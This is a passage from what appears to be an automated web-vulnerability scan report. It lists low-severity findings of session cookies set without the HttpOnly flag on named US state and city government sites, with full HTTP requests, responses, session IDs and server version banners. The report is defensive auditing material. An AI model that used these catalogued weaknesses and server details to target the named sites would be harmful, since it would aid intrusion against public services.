Content-Length: 3132
Set-Cookie: JSESSIONID=FFF26F20EB9B38A02149ECC1A088ACF2.portalprod9; Path=/paams-app
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin tem
...[SNIP]...

14.5. https://apps.tn.gov/paams-app/recover/resetpassword.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://apps.tn.gov
Path:   /paams-app/recover/resetpassword.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paams-app/recover/resetpassword.htm HTTP/1.1
Host: apps.tn.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AEF01406437498DCCCE8EB0A4BC568BD.portalprod1; __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:00 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 2897
Set-Cookie: JSESSIONID=A7331F2AF1D25E9E95F58D50429AE95C.portalprod9; Path=/paams-app
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin tem
...[SNIP]...

14.6. https://apps.tn.gov/paams-app/recover/retrieveusermane.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://apps.tn.gov
Path:   /paams-app/recover/retrieveusermane.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paams-app/recover/retrieveusermane.htm HTTP/1.1
Host: apps.tn.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AEF01406437498DCCCE8EB0A4BC568BD.portalprod1; __utmz=58316655.1304123847.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58316655.1042378530.1304123847.1304123847.1304123847.1; __utmc=58316655; __utmb=58316655.2.10.1304123847;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:01 GMT
Server: Apache-Coyote/1.1
X-Powered-By:
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 2952
Set-Cookie: JSESSIONID=E8C7670E3CD6BE9451F68F8D14687A75.portalprod9; Path=/paams-app
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin tem
...[SNIP]...

14.7. https://assist.dhss.delaware.gov/PGM/ASP/SAACC.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SAACC.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SAACC.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 12945
Content-Type: text/html
Expires: Sat, 30 Apr 2011 12:16:42 GMT
Set-Cookie: ASPSESSIONIDCCQADQAB=GEPDNOPBOFHGBLHKMGMMOFAC; path=/
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="EN">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Pragma" CONTEN
...[SNIP]...

14.8. https://assist.dhss.delaware.gov/PGM/ASP/SACOM.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SACOM.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SACOM.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 15110
Content-Type: text/html
Expires: Sat, 30 Apr 2011 12:16:42 GMT
Set-Cookie: ASPSESSIONIDCCQADQAB=KEPDNOPBNEHEIGLBKDOCIABI; path=/
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="EN">
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Pragma" CONTEN
...[SNIP]...

14.9. https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC001.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SC001.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
Referer: http://de.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 01:08:29 GMT; path=/
Date: Sat, 30 Apr 2011 00:36:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 10198
Content-Type: text/html
Expires: Sat, 30 Apr 2011 00:36:04 GMT
Set-Cookie: ASPSESSIONIDACRDBQAB=OAHJLMKBGIPGBEPPPHDCDBNC; path=/
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html LANG="en">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTE
...[SNIP]...

14.10. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC002.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SC002.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 302 Object moved
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Location: SMPRB.asp
Content-Length: 130
Content-Type: text/html
Expires: Sat, 30 Apr 2011 12:16:42 GMT
Set-Cookie: ASPSESSIONIDCCQADQAB=OEPDNOPBNPCHGDCKHCLEEKDM; path=/
Cache-control: no-cache

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="SMPRB.asp">here</a>.</body>

14.11. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC020.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SC020.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCQADQAB=EFPDNOPBJHAIFLCHBDHBDKEP; path=/
Cache-control: private


14.12. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC020.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SC020.asp?hdn_Language=EN&hdn_ProcessId=1 HTTP/1.1
Host: assist.dhss.delaware.gov
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: assist-persist=170663852.51305.0000

Response

HTTP/1.1 302 Object moved
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 02:17:18 GMT; path=/
Date: Sat, 30 Apr 2011 01:44:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: SC002.asp?hdn_SessionId=3117824831351042911214452&hdn_ApplicationNum=
Content-Length: 194
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACRDBQAB=MCHJLMKBFHJENFPIGFNLJLOK; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="SC002.asp?hdn_SessionId=3117824831351042911214452&amp;hdn_ApplicationNum=">here</a>.</body>

14.13. https://assist.dhss.delaware.gov/PGM/ASP/SC024.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC024.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SC024.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 10129
Content-Type: text/html
Expires: Sat, 30 Apr 2011 12:16:42 GMT
Set-Cookie: ASPSESSIONIDCCQADQAB=MFPDNOPBMJLFMKBMDONPECJF; path=/
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html LANG="en">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTE
...[SNIP]...

14.14. https://assist.dhss.delaware.gov/PGM/ASP/SC031.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://assist.dhss.delaware.gov
Path:   /PGM/ASP/SC031.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PGM/ASP/SC031.asp HTTP/1.1
Host: assist.dhss.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: assist-persist=170663852.51305.0000; ASPSESSIONIDACRDBQAB=LCHJLMKBCBGEJHLNDKCANOHB;

Response

HTTP/1.1 200 OK
Set-Cookie: assist-persist=170663852.51305.0000; expires=Sat, 30-Apr-2011 12:49:08 GMT; path=/
Connection: close
Date: Sat, 30 Apr 2011 12:16:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 16134
Content-Type: text/html
Expires: Sat, 30 Apr 2011 12:16:42 GMT
Set-Cookie: ASPSESSIONIDCCQADQAB=GGPDNOPBCNJOIMNCHIBHMPMF; path=/
Cache-control: no-cache


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html LANG="en">
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<meta HTTP-EQUIV="Pragma" CONTE
...[SNIP]...

14.15. http://az.gov/app/calendar/CalendarRemoteDisplay.xhtml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://az.gov
Path:   /app/calendar/CalendarRemoteDisplay.xhtml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app/calendar/CalendarRemoteDisplay.xhtml HTTP/1.1
Host: az.gov
Proxy-Connection: keep-alive
Referer: http://az.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Proxy-Connection: Keep-Alive
Via: HTTP/1.1 aayslb2 (IBM-PROXY-WTE)
Date: Sat, 30 Apr 2011 11:15:03 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
X-Powered-By: JSF/1.2
Content-Type: application/xhtml+xml;charset=UTF-8
Content-Length: 6032
Set-Cookie: JSESSIONID=D59995EC79DD38BD722B830119C04CCB; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...

14.16. http://badge.dopiaza.org/flickr/badge.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://badge.dopiaza.org
Path:   /flickr/badge.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flickr/badge.php?user=58853148@N02;num=7;sort=date-posted-desc;style=flow-horizontal;callback=jsonp1304124049963 HTTP/1.1
Host: badge.dopiaza.org
Proxy-Connection: keep-alive
Referer: http://www.tn.gov/governor/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:44:22 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: PHPSESSID=eb1450a60458fcbd8f1fc5def1325bc9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 2377

jsonp1304124049963({source: "Cache [1130]", badge: "<ul class=\"dopiaza-flickr-badge-content\"><li class=\"first\"><img src=\"http://farm6.static.flickr.com/5184/5670892514_671c7b3fe4_s.jpg\" data-pho
...[SNIP]...

14.17. http://ca.gov/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ca.gov
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ca.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29674
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: mobile=1; expires=Thu, 05-May-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQQSRSTCB=OKLPJNDCPHBELGLNEKLMGIOL; path=/
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 22:09:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

<t
...[SNIP]...

14.18. http://cityofmuscleshoals.com/Default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://cityofmuscleshoals.com
Path:   /Default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.asp HTTP/1.1
Host: cityofmuscleshoals.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:19:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
Content-Length: 12767
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQBRQBTR=FMMIMMOBDHDHEIKEOFLEMEMB; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<base href="http://cityofmuscleshoals.com/Sites/Muscle_Shoals/" />
<title>Muscle Shoals, Alabama | Main-Homepage</title
...[SNIP]...

14.19. http://crd.dnr.state.ga.us/content/displaynavigation.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://crd.dnr.state.ga.us
Path:   /content/displaynavigation.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/displaynavigation.asp HTTP/1.1
Host: crd.dnr.state.ga.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 11:49:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 14122
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQABBRRSD=FPCPLBOBDDAPADHEKDOAGCIF; path=/
Cache-control: private

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...

14.20. https://dhr.ky.gov/DHRWeb/RS  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://dhr.ky.gov
Path:   /DHRWeb/RS

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DHRWeb/RS HTTP/1.1
Host: dhr.ky.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 Document follows
Server: IBM HTTP Server/V5R3M0
Connection: close
Accept-Ranges: bytes
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 10123
Last-Modified: Sat, 30 Apr 2011 12:20:07 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Language: en-US
Set-Cookie: JSESSIONID=0000nPEe3iyv3vDZg8IytDP4Wxw:C5A1D6DE31FD990B000007D400000F8A00000000; Path=/
Date: Sat, 30 Apr 2011 12:20:08 GMT
Server: WebSphere Application Server/7.0
Cache-Control: no-cache="set-cookie, set-cookie2"


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>

       <title>DHR.KY.GOV - Home Page</title>
       
       <meta
...[SNIP]...

14.21. http://dnr.maryland.gov/service/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dnr.maryland.gov
Path:   /service/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /service/ HTTP/1.1
Host: dnr.maryland.gov
Proxy-Connection: keep-alive
Referer: http://www.maryland.gov/onlineservices/Pages/onlineservices.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=267304850.1304117506.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=267304850.1573057516.1304117506.1304117506.1304123952.2; __utmc=267304850; __utmb=267304850

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12322
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSBTDSBR=FJMDKNEBKFOKABEAMMEPDJAI; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...

14.22. https://dotax.ehawaii.gov/efile/user  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://dotax.ehawaii.gov
Path:   /efile/user

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /efile/user HTTP/1.1
Host: dotax.ehawaii.gov
Connection: keep-alive
Referer: https://www.ehawaii.gov/efile/
Cache-Control: max-age=0
Origin: https://www.ehawaii.gov
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=180588659.1320072404.1304201425.1304201425.1304201425.1; __utmb=180588659; __utmc=180588659; __utmz=180588659.1304201425.1.1.utmccn=(referral)|utmcsr=hawaii.gov|utmcct=/|utmcmd=referral
Content-Length: 78

SESSION_ID=&CURRSTATE=com.hic.dotax.user.gui.Login&SSN=&PASSWORD=&SUBMIT=Login

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=4969BAED74BE5E78E258F5BA163F8473.lono; Path=/efile
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 7156

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

14.23. https://edmv-sp.dot.state.nc.us/sp/NoticeServlet  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://edmv-sp.dot.state.nc.us
Path:   /sp/NoticeServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sp/NoticeServlet HTTP/1.1
Host: edmv-sp.dot.state.nc.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 30 Apr 2011 12:20:11 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=7c3040c8da2cc658aa73106c674932715d58;Secure;path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://www.ncdot.org/dmv
Cache-Control: no-store
Content-Length: 0


14.24. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://egov.dnrec.delaware.gov
Path:   /egovpublic/dnrec/disp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /egovpublic/dnrec/disp HTTP/1.1
Host: egov.dnrec.delaware.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 30 Apr 2011 12:20:03 GMT
Server: Apache/2.2.0 (Fedora)
Surrogate-Control: no-store
$WSEP:
Set-Cookie: JSESSIONID=0000i5hwqBmEjB1A7BDb_F_urhk:1414d4ncb; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 12
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

Error 500:

14.25. http://elicense4-lookup.com.ohio.gov/SearchCriteria.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://elicense4-lookup.com.ohio.gov
Path:   /SearchCriteria.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

